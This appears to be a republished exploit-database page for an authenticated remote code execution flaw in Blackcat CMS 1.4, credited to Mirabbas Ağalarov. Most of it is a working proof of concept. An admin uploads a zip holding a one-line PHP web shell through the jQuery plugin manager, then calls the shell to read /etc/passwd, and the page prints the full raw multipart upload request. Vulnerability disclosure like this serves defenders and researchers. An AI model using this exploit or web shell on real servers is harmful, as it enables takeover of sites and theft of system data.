Home Tools Exploits & CVE's Blackcat CMS 1.4 Shell Upload

Blackcat CMS 1.4 Shell Upload

July 21, 2023

223

Blackcat CMS version 1.4 suffers from a remote shell upload vulnerability.

Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE)
Application: blackcat Cms
Version: v1.4
Bugs:  RCE
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date of found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 
1. login to account as admin
2. go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr)
3. upload zip file but this zip file must contains poc.php 
poc.php file contents 
<?php $a=$_GET['code']; echo system($a);?>
4.Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd

Poc request

POST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1
Host: localhost
Content-Length: 577
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti
Connection: close

------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="upload"

1
------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="userfile"; filename="poc.zip"
Content-Type: application/zip

PKvalsdalsfapoc.php<?php 
$a=$_GET['code']; 
echo system($a);
?>
blabalaboalpoc.php
blablabla
------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="submit"

Upload
------WebKitFormBoundaryBRByJwW3CUSHOcBT--

Blackcat CMS 1.4 Shell Upload

Follow us on Instagram @thecyberpost

EDITOR PICKS

Windows PspBuildCreateProcessContext Double-Fetch / Buffer Overflow

Online Tours And Travels Management System 1.0 SQL Injection

Packet Storm New Exploits For April, 2024

POPULAR POSTS

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

POPULAR CATEGORY

Polycom BToE Connector 4.4.0.0 Buffer Overflow / Man-In-The-Middle

Progress Software WS_FTP Unauthenticated Remote Code Execution

FiberHome HG6245D Disclosure / Bypass / Privilege Escalation / DoS